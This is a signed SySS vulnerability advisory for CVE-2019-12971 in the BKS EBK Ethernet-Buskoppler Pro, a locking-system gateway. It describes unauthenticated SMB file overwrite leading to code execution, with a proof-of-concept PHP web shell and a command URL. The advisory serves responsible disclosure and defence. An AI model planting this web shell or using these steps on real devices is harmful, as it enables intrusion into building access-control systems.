Share
## https://sploitus.com/exploit?id=PACKETSTORM:153525
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
Advisory ID: SYSS-2019-017  
Product: BKS EBK Ethernet-Buskoppler Pro  
Manufacturer: BKS GmbH  
Affected Version(s): < 3.01  
Vulnerability Type: Unrestricted Upload of File with Dangerous Type (CWE-434)   
Risk Level: High  
Solution Status: Fixed  
Manufacturer Notification: April 23, 2019  
Solution Date: June 14, 2019  
Public Disclosure: July 03, 2019  
CVE Reference: CVE-2019-12971  
Author of Advisory: Sebastian Auwaerter, SySS GmbH  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Overview:  
  
The "EBK Ethernet-Buskoppler Pro" appliance provided by BKS GmbH is a  
gateway to communicate with the access terminals of BKS locking systems.  
The appliance is generally attached to a company's IP-based network and  
communicates with the locking systems via a proprietary bus system.  
  
Due to an unauthenticated upload functionality through Samba, the BKS  
Ethernet-Buskoppler Pro is vulnerable to remote code execution.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerability Details:  
  
An unauthenticated attacker can connect to an Ethernet-Buskoppler Pro  
using any client that supports uploading files via SMB (e.g. smbclient,  
Nautilus, Windows Explorer) and overwrite files located in the web root  
directory of the appliance. After adding a web shell to any of the  
existing PHP scripts, the attacker can execute it by accessing the  
edited script via the web server listening on the TCP port 443.  
  
According to BKS, only Appliances based on a Raspberry Pi 3 are affected  
since the vulnerability has been introduced during an upgrade from  
Raspberry Pi 2 to 3.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC):  
  
As proof-of-concept, the file index.php can be altered via SMB  
(e.g. gedit smb://<VULNERABLE_HOST>/webinterface/index.php) to allow a   
web shell in the context of the user account www-data:  
  
- ----------------  
index.php:  
<?php   
  
if ($_REQUEST['pw'] === "very-secure-password"){  
system($_REQUEST['cmd']);  
}  
set_include_path('/var/www/ebkpro_website');  
include 'include/debug.php';  
[...]  
- ----------------  
  
The web shell can then be used to execute commands by navigating to the  
following URL:  
  
http://<VULNERABLE_HOST>:80/index.php?pw=very-secure-password&cmd=<COMMAND>  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Solution:  
  
BKS provides update packages for the EBK Ethernet-Buskoppler. The updater  
in version 1.2.1.2 contains firmware version 3.01 which fixes the  
vulnerability.   
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclosure Timeline:  
  
2019-04-10: Vulnerability discovered  
2019-04-23: Vulnerability reported to manufacturer  
2019-06-14: Patch released by manufacturer  
2019-07-03: Public disclosure of vulnerability  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
References:  
  
[1] SySS Security Advisory SYSS-2019-017  
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-017.txt  
[2] SySS Responsible Disclosure Policy  
https://www.syss.de/en/responsible-disclosure-policy/  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Credits:  
  
This security vulnerability was found by Sebastian Auwaerter of SySS  
GmbH.  
  
E-Mail: sebastian.auwaerter@syss.de  
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Auwaerter.asc  
Key Fingerprint: F98C 3E12 6713 19D9 9E2F BE3E E9A3 0D48 E2F0 A8B6  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclaimer:  
  
The information provided in this security advisory is provided "as is"   
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Copyright:  
  
Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en  
  
-----BEGIN PGP SIGNATURE-----  
  
iQIzBAEBCgAdFiEE+Yw+EmcTGdmeL74+6aMNSOLwqLYFAl0bAL4ACgkQ6aMNSOLw  
qLZv5xAAmcFcqsdPSPdqFNAJyBNIfKr0scJo/j1jtZLWE7rW/Z9j3WHLpaOEuir9  
n6K1NkMnidA1MxSnagwbYH4c4DDjINhucN93U8r4kZ0NIBbvXIzso2Jq0f/2rl2h  
GxADzm7d2Z35zNL4CLsqQ6t/ufE9tluLx8kGPEeGkZ/6rZa+ie6MsMyiy6cdccGr  
Fxk1/vWaWLHE3qTSJb8Zz+72nBl4GmZvNlGmBkIIw9/xu0A2DyepZsSv3Uzvh43j  
fTHs+vpldq+BZ3PLb8ugJmIgK0JrLKyvnCf4TgmZ2XZ1vNtcRtMnwhy6QB6aherc  
s+M9KYWI2UfF6VX5P0dr2hLdPFrmoCg5QKJrbK3P8bVYWuYdm9sWuCaeE0qYrk9a  
Q7ohGI9F9HTZJBeQVfN0LQVINrHOXqZ9e1yMULtEUHyJCo3RQko98Dx0THv6lSDO  
6a5Hl4UlqyOupbZDOdzmEnoZdCEHd8NgiA2ozCmyvD5bfQcqDyeZDq//IJJXv5d5  
KB96twyuYR+PkmcJP89zBREbs0+v4aPXE50yFFAqhDwHfKs8cvQC+t+VqMEN2SFd  
IOFjBl9oXcu+2bmgcJ8Ob0Qli2FPP7JF0ern+5pLLp1zGBR+QneKPNqVGCNfciAL  
1T7Db1u1HE9cmSit5gaqLMPodqmXyifqDRfj9fK1obgPx01GFLY=  
=JGkX  
-----END PGP SIGNATURE-----